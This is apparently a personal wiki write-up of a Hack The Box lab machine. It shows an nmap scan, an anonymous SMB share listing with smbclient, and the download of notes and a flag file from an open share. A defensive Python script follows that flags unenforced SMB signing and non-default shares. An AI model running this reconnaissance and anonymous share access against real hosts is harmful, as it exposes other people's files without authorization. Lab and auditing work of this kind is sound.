HTB_Dancing - meruneru/tech_memo GitHub Wiki
Intro machine.
#Port 445, i.e. #SMB, is open.
┌─[htb-meruneru@htb-4ygdk8b8dx]─[~]
└──╼ $nmap -sV -sC -Pn 10.129.185.108
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 13:54 UTC
Nmap scan report for 10.129.185.108
Host is up (0.078s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4h10m06s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-12T18:04:50
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.46 seconds
Anonymous login works.
┌─[htb-meruneru@htb-4ygdk8b8dx]─[~]
└──╼ $smbclient -L 10.129.185.108
Enter WORKGROUP\htb-meruneru's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
┌─[✗]─[htb-meruneru@htb-4ygdk8b8dx]─[~]
└──╼ $smbclient //10.129.185.108/WorkShares
Enter WORKGROUP\htb-meruneru's password:
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
. D 0 Mon Mar 29 08:22:01 2021
.. D 0 Mon Mar 29 08:22:01 2021
Amy.J D 0 Mon Mar 29 09:08:24 2021
James.P D 0 Thu Jun 3 08:38:03 2021
smb: \> get Amy.J\worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as Amy.J\worknotes.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get James.P\flag.txt
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \>
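
The two findings above (SMB2 signing "enabled but not required" and a non-default share visible without credentials) can be flagged automatically when auditing scan results for your own hosts. The following is an added example, not part of the original wiki page; the function names and the trimmed sample inputs are assumptions for illustration.

```python
import re

# Sample input, trimmed from the scan and share listing shown on this page.
NMAP_REPORT = """\
Nmap scan report for 10.129.185.108
445/tcp open  microsoft-ds?
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""
SHARE_LISTING = """\
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    WorkShares      Disk
"""
# Built-in administrative shares (ADMIN$, IPC$, PRINT$, drive letters such as C$).
BUILTIN = re.compile(r"(ADMIN|IPC|PRINT|[A-Z])\$")

def signing_findings(report):
    """Return (host, dialect, status) where SMB2 signing is not enforced."""
    findings, host, dialect, in_script = [], None, None, False
    for line in report.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            host, dialect, in_script = m.group(1), None, False
            continue
        body = line.lstrip("|_ ").strip()  # drop nmap's script-output gutter
        if body.startswith("smb2-security-mode"):
            in_script = True
        elif in_script and re.fullmatch(r"[\d.:]+", body):
            dialect = body.rstrip(":")  # e.g. "2.02"
        elif in_script and body.startswith("Message signing"):
            if "not required" in body or "disabled" in body:
                findings.append((host, dialect, body))
    return findings

def custom_shares(listing):
    """Return non-built-in share names from an `smbclient -L` listing."""
    rows = re.finditer(r"^[ \t]*(\S+)[ \t]+(?:Disk|IPC|Printer)\b", listing, re.M)
    return [m.group(1) for m in rows if not BUILTIN.fullmatch(m.group(1))]

if __name__ == "__main__":
    print(signing_findings(NMAP_REPORT))
    print(custom_shares(SHARE_LISTING))
```

Any host returned by `signing_findings` should have SMB signing set to required, and every share returned by `custom_shares` should have its permissions reviewed so it is not readable without credentials.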